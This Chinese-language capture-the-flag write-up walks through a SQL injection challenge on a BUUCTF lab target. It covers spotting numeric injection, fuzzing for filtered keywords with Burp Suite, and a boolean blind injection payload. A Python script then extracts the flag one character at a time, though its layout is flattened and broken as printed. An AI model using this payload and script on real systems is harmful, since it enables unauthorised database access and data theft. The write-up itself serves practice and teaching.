一、分析判断

进入靶机，主页面如图：

主页面提供给我们一条关键信息： flag值在 表flag 中的 flag列 中。

接着我们尝试输入不同的id，情况分别如图：

当id=1时：

当id=2时：

当id=3时：

 我们发现，页面提示该用户不存在，往后输入4、5....依旧如此，id=0时也一样。

当尝试 id= abc等字母时：

提示类型错误，我们猜测注入类型为数字型注入。

带着猜测，我们尝试 id=1'：

 猜测成立，注入类型为数字型注入。

然后我们尝试从表flag，列flag中查询flag的值：

1 union select flag from flag

意外出现了，页面提示我们后端代码中存在SQL注入检测，说明注入语句中有关键字被过滤了。

我们需要查询哪些关键字被过滤了。

当我们尝试 id=select时：

显示类型错误，显然后端将 select 当成用户名了，那我们加上1试一试。

当 id=1 select 时：

我们发现 select 果真被过滤了，发现检查方法之后，利用Burpsuite抓包和Fuzz字典对id进行爆破，检测哪些关键字被过滤掉了。

通过查看 resoponse 得知，Length=535的关键字全部都被过滤掉了，其中 union、select、extracvalue、updatexml、sleep等常见注入关键字全部都被过滤，目前只剩下一条路可走---布尔盲注。

从上文得知，id=1时，页面会回显一段文字，那么我们使用布尔盲注，使布尔值等于1，那么等效于我们在 id框中输入1。

如：

(ascii(substr((select(flag)from(flag)),1,1))>32) 若成立，则会返回1，id=1时会回显出一段字符，根据是否回显，我们可以一个一个地将flag中的字符拆解出来。

这就需要我们使用到 python 去编写盲注脚本：

import timeimport requestsurl = "http://3d63bec3-9674-4015-8b95-665ab2c68324.node5.buuoj.cn:81/index.php"result = ""for i in range(1, 50): for j in range(32, 128): #time.sleep(0.1) payload = "(ascii(substr((select(flag)from(flag)),{m},1))>{n})" response = requests.post(url=url, data={'id':payload.format(m=i,n=j)}) if response.text.find('girl') == -1: result += chr(j) print(j) break print("正在注出flag:", result)print("flag的值为:", result)

跑出结果如下图：

最终拿到 flag，成功提交通关。